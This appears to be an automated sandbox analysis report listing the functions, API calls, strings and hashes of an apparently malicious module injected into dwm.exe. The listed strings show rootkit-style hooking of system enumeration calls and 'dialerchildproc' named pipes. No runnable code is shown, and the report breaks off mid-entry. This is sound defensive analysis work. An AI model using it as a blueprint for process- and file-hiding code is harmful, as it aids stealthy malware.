WriteFile.KERNEL32 ref: 000002BAAE2A021E
WriteFile.KERNEL32 ref: 000002BAAE2A0270
GetLastError.KERNEL32 ref: 000002BAAE2A0372
GetLastError.KERNEL32 ref: 000002BAAE2A03D2

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: a859049abdb16ce4ebf42fd7aa69fcbe0bfb847c249d9fbfc8642fcfb804d372
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 28E1F372B14B809EEB10CF64D4A86DD7BB1F3497C8F244116DE8A57B99DB34C82AC711

Function 000002BAAE2912C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002BAAE291326
GetProcessHeap.KERNEL32 ref: 000002BAAE291334
HeapAlloc.KERNEL32 ref: 000002BAAE291345
RegEnumValueW.ADVAPI32 ref: 000002BAAE2913A1

Part of subcall function 000002BAAE291554: StrCmpIW.SHLWAPI ref: 000002BAAE291585

GetProcessHeap.KERNEL32 ref: 000002BAAE2913E9
HeapAlloc.KERNEL32 ref: 000002BAAE2913F7
GetProcessHeap.KERNEL32 ref: 000002BAAE29141B
HeapFree.KERNEL32 ref: 000002BAAE291429
lstrlenW.KERNEL32 ref: 000002BAAE291432
GetProcessHeap.KERNEL32 ref: 000002BAAE291440
HeapAlloc.KERNEL32 ref: 000002BAAE29144E
StrCpyW.SHLWAPI ref: 000002BAAE291470
GetProcessHeap.KERNEL32 ref: 000002BAAE291485
HeapFree.KERNEL32 ref: 000002BAAE291493

Strings

d, xrefs: 000002BAAE291365

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: b50dc7ca44172374ecb8a152eb7f1271102f938ee15b38396310bd3df9ef205d
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 75516A72214B84D3EB24CF62E55839EB3B1F78CB80F698124DA8947B14DF38C46ACB51

Function 000002BAAE291EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002BAAE291EBF

Part of subcall function 000002BAAE292174: GetModuleHandleA.KERNEL32 ref: 000002BAAE29218C
Part of subcall function 000002BAAE292174: GetProcAddress.KERNEL32 ref: 000002BAAE29219D

Part of subcall function 000002BAAE295C10: GetCurrentThreadId.KERNEL32 ref: 000002BAAE295C4B

Strings

advapi32.dll, xrefs: 000002BAAE291F97, 000002BAAE291FB8
NtResumeThread, xrefs: 000002BAAE291F02
ntdll.dll, xrefs: 000002BAAE291ECD
EnumServicesStatusExW, xrefs: 000002BAAE291FB1, 000002BAAE291FD2
NtEnumerateKey, xrefs: 000002BAAE291F59
sechost.dll, xrefs: 000002BAAE291FD9
EnumServiceGroupW, xrefs: 000002BAAE291F90
NtDeviceIoControlFile, xrefs: 000002BAAE291FF6
NtQueryDirectoryFileEx, xrefs: 000002BAAE291F3C
NtQuerySystemInformation, xrefs: 000002BAAE291EE5
NtQueryDirectoryFile, xrefs: 000002BAAE291F1F
NtEnumerateValueKey, xrefs: 000002BAAE291F76

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 62048474f1622cef0cd1ed3fd92ed1851e8e67166020a3114eb23de86730bcf9
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 9E31A7A6201A4AA0FE54EF68F8797D83335BB4C344FB464139599031769F398A6EC372

Function 000002BAAE2923F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002BAAE292405
GetCurrentProcessId.KERNEL32 ref: 000002BAAE29240F

Part of subcall function 000002BAAE2919AC: OpenProcess.KERNEL32 ref: 000002BAAE2919CA
Part of subcall function 000002BAAE2919AC: IsWow64Process.KERNEL32 ref: 000002BAAE2919E0
Part of subcall function 000002BAAE2919AC: CloseHandle.KERNEL32 ref: 000002BAAE2919FB

CreateFileW.KERNEL32 ref: 000002BAAE292468
WriteFile.KERNEL32 ref: 000002BAAE292490
ReadFile.KERNEL32 ref: 000002BAAE2924AF
CloseHandle.KERNEL32 ref: 000002BAAE2924B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 000002BAAE29243F
\\.\pipe\dialerchildproc64, xrefs: 000002BAAE292438

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 94df7aad55870c6114d792a3ca31530cc33901cf673093f76ee9391ce6b5f9b3
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 29213D36614B4082FB108B25F46835E73B0F789BA4F605215EA9903BA8CF7DC559CB12

Function 000002BAAE29104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002BAAE2910AB
RegEnumValueW.ADVAPI32 ref: 000002BAAE29110E
GetProcessHeap.KERNEL32 ref: 000002BAAE291155
HeapAlloc.KERNEL32 ref: 000002BAAE291163
GetProcessHeap.KERNEL32 ref: 000002BAAE291187
HeapFree.KERNEL32 ref: 000002BAAE291195

Strings

d, xrefs: 000002BAAE2910CE

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 2137402fa7a4f9d3f487ec589900a2554cd92a97186cd8a2ced61d72f102976b
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 80415B33214B80D7EB648F62E45879EB7B1F388B84F148129DBC907A58DF39D969CB10

Function 000002BAAED869F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002BAAED86A18
__scrt_acquire_startup_lock.LIBCMT ref: 000002BAAED86A6A
_RTC_Initialize.LIBCMT ref: 000002BAAED86A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002BAAED86ABE
__scrt_release_startup_lock.LIBCMT ref: 000002BAAED86AE9

Memory Dump Source

Source File: 0000000A.00000002.3065262959.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baaed80000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: afa602538d2797bded4b6c7ea06a470d0bb9dafd4f93a30f4a6eaa79a6e8d66a
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 4081F7317002C186FA50AB65984D37977F0E7457A0F744025AAED87B96EB7ACC46C333

Function 000002BAAE2975F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002BAAE297618
__scrt_acquire_startup_lock.LIBCMT ref: 000002BAAE29766A
_RTC_Initialize.LIBCMT ref: 000002BAAE297698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002BAAE2976BE
__scrt_release_startup_lock.LIBCMT ref: 000002BAAE2976E9

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: afb9fb156faf5e5d612a2f5814e8a32b2a12bb5acb6f98cdc0cfee454d448a41
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: BC81E42170424586FF64AB25987D3A933B0BB8DB80F3464259AC947796DB3ACC5DC733

Function 000002BAAE2669F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002BAAE266A18
__scrt_acquire_startup_lock.LIBCMT ref: 000002BAAE266A6A
_RTC_Initialize.LIBCMT ref: 000002BAAE266A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002BAAE266ABE
__scrt_release_startup_lock.LIBCMT ref: 000002BAAE266AE9

Memory Dump Source

Source File: 0000000A.00000002.3060708588.000002BAAE260000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae260000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 0fbeb9709375f7d2d595d23e8cc5425cf001224d31ba1ac4dc797d63e0b44c4d
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 1D81F26170064186FE60AB6AA47D359F3F1EBAD780F348225DAC553796DB39C84DC332

Function 000002BAAE299804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000002BAAE299889
GetLastError.KERNEL32 ref: 000002BAAE299897
LoadLibraryExW.KERNEL32 ref: 000002BAAE2998C1
FreeLibrary.KERNEL32 ref: 000002BAAE299907
GetProcAddress.KERNEL32 ref: 000002BAAE299913

Strings

api-ms-, xrefs: 000002BAAE2998A9

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: d49739ca775cc0803dc4d4d5668a84a42e2d4fdbad9d71cd4f5b62f92ef0e885
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 1331A331212B5491FE219B42A82879973B4FB0CBB0F291529DDAD4B380EF39C85DC322

Function 000002BAAE2A1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002BAAE2A1BCD
GetLastError.KERNEL32 ref: 000002BAAE2A1BD9
CloseHandle.KERNEL32 ref: 000002BAAE2A1BF1
CreateFileW.KERNEL32 ref: 000002BAAE2A1C1C
WriteConsoleW.KERNEL32 ref: 000002BAAE2A1C3B

Strings

CONOUT$, xrefs: 000002BAAE2A1BFD

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 4799e37deccdbe521ca6658cb44aafa6b261db0bd2ca4878bbef8e51be7836f3
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: D0118F21314B5086EB608B56E868319B3B0F78CFE4F244225EA9D87794DF78C928C756

Function 000002BAAE2930B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002BAAE2930D7
HeapAlloc.KERNEL32 ref: 000002BAAE2930EA
StrCmpNIW.SHLWAPI ref: 000002BAAE29316B
GetProcessHeap.KERNEL32 ref: 000002BAAE2931D1
HeapFree.KERNEL32 ref: 000002BAAE2931DF

Strings

dialer, xrefs: 000002BAAE293164

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: be985432805b6dc513fe067e9bded38555f4cade0e1d73a1f31678ba353d60e7
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 4231A221701B51D2EF65DF56E868269B3B0FB48B84F1C90249EC907B64EF39C8A9C721

Function 000002BAAE291A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002BAAE291A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000002BAAE291A58
PathFindFileNameW.SHLWAPI ref: 000002BAAE291A67
lstrlenW.KERNEL32 ref: 000002BAAE291A73
StrCpyW.SHLWAPI ref: 000002BAAE291A86
CloseHandle.KERNEL32 ref: 000002BAAE291A94

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 8c38a29e414c5705bcc91b17333df8a21700ab624f0ecff550373e14768e202c
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 7B015721300A4196EA20DB22E86835A73A1F78CFC0F688035CE8A47758DF39C999C761

Function 000002BAAE2937AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002BAAE2937C8
GetCurrentProcess.KERNEL32 ref: 000002BAAE2937D6
VirtualProtectEx.KERNEL32 ref: 000002BAAE2937F8
GetCurrentProcess.KERNEL32 ref: 000002BAAE293819
VirtualProtectEx.KERNEL32 ref: 000002BAAE29383A
TerminateThread.KERNEL32 ref: 000002BAAE293849

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 05fbab74c7a2e1d374d0c11e81ca85e75b20dcaa6f63722ad261d8019961d775
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: C4111765611B4486FF249B21E82D71AB7B1BB5DB81F240429CA8907764EF3DC86CC722

Function 000002BAAE2990D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002BAAE299103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002BAAE299198
RtlUnwindEx.NTDLL ref: 000002BAAE2991E7

Strings

csm, xrefs: 000002BAAE29917E
f, xrefs: 000002BAAE299116

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: 243d263a016e5836524a2715184f34e8c3ba0fefcbf3b7bdfb362b129e4cbaec
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 7851CF32B526008AEF14DF25E46CB5937B5F348BA8F749120DE9A47788DB36DC49C722

Function 000002BAAE291AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002BAAE291AD8
StrCmpNIW.SHLWAPI ref: 000002BAAE291AF2
lstrlenW.KERNEL32 ref: 000002BAAE291B01
StrCpyW.SHLWAPI ref: 000002BAAE291B16

Strings

\\?\, xrefs: 000002BAAE291AE6

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: e769027026d0c74d640bbab288917140e62458a0d68b5e7d7c44d05411ac6093
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: A1F03C6230464192EF708B25E4A83597771F758B88F949031CA8A47954DF6DCA9CCB11

Function 000002BAAE293200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002BAAE293222
StrCpyW.SHLWAPI ref: 000002BAAE293232
StrCatW.SHLWAPI ref: 000002BAAE29323E
PathCombineW.SHLWAPI ref: 000002BAAE29324C

Strings

\\.\pipe\, xrefs: 000002BAAE293218

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 22ccd04281dca7aeb2f320fe679ebc694a719ec6f431ce4d470ba5bf544b3c20
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 8AF08220704B8091EE208B13B92C119B771AB4CFD0F289131DEDA47B28CF2CC869C711

Function 000002BAAE29A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002BAAE29A154
GetProcAddress.KERNEL32 ref: 000002BAAE29A16A
FreeLibrary.KERNEL32 ref: 000002BAAE29A187

Strings

mscoree.dll, xrefs: 000002BAAE29A14B
CorExitProcess, xrefs: 000002BAAE29A163

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: b72d4fde4e442437168374d0a0fe60d391ffe2b79a8d05e3bcb3f7aed35f74cf
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 3FF037A131174491FF585F60E8AC3693370EB5CB90F682419958B47575DF7CC8ACC722

Function 000002BAAE2A0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002BAAE2A08A2
GetConsoleMode.KERNEL32 ref: 000002BAAE2A0960
GetLastError.KERNEL32 ref: 000002BAAE2A09EA

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: b1ddb58fa5e6936b5ffd4475e2243badcb60c5ebdc53fff48fe702909b4df6dc
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: C781D122A106148DFF609F618878BED77B1F74CB94F644616DE8A537D2DB34886AC332

Function 000002BAAE2957F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002BAAE295806

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
Instruction ID: a854c8f8c128b85c5ae7c74125b40c46c5d9c47bb56728e394e25268d633a265
Opcode Fuzzy Hash: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
Instruction Fuzzy Hash: 0A61C836619B44C6EB609B15F46831AB7B0F38C744F201115EACE47BA8DB7DC958CF61

Function 000002BAAED912B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002BAAED912E0
_set_statfp.LIBCMT ref: 000002BAAED912FB
_set_statfp.LIBCMT ref: 000002BAAED91317
_set_statfp.LIBCMT ref: 000002BAAED91353

Memory Dump Source

Source File: 0000000A.00000002.3065262959.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baaed80000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 46f915988d1421102dcdc82b7975ccb72b32a6b5722b91e8b7d4d7e4d90cae6a
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 2A117322A54A1101FA641175ED5E36933716B54374F7B462CAAFF0AFE6AB2A8C43C122

Function 000002BAAE2A1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002BAAE2A1EE0
_set_statfp.LIBCMT ref: 000002BAAE2A1EFB
_set_statfp.LIBCMT ref: 000002BAAE2A1F17
_set_statfp.LIBCMT ref: 000002BAAE2A1F53

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: fb897314bb80f6e4fbd02af684fafd6f3212bc1cdf147bf0c68ed76bc349400d
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: F611C6A3A54B8001FEA81168E57E36573707B6C374F380674BAF6873D68B188C69C123

Function 000002BAAE2712B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002BAAE2712E0
_set_statfp.LIBCMT ref: 000002BAAE2712FB
_set_statfp.LIBCMT ref: 000002BAAE271317
_set_statfp.LIBCMT ref: 000002BAAE271353

Memory Dump Source

Source File: 0000000A.00000002.3060708588.000002BAAE260000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae260000_dwm.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 683f9b8f68ede20b299d0a7e2179748c0e82f89c77eef79aed7258c88994293d
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 651173A2B54A1101FFA41265E97E36933716F5C374F784634AEF606BD6AB188C49C122

Function 000002BAAED884F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002BAAED88503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002BAAED88598

Strings

f, xrefs: 000002BAAED88516
csm, xrefs: 000002BAAED8857E

Memory Dump Source

Source File: 0000000A.00000002.3065262959.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baaed80000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: dd434be0664191bedbfb9aec411bcd668004c6ad845439f1ee4a200c2d89c5f7
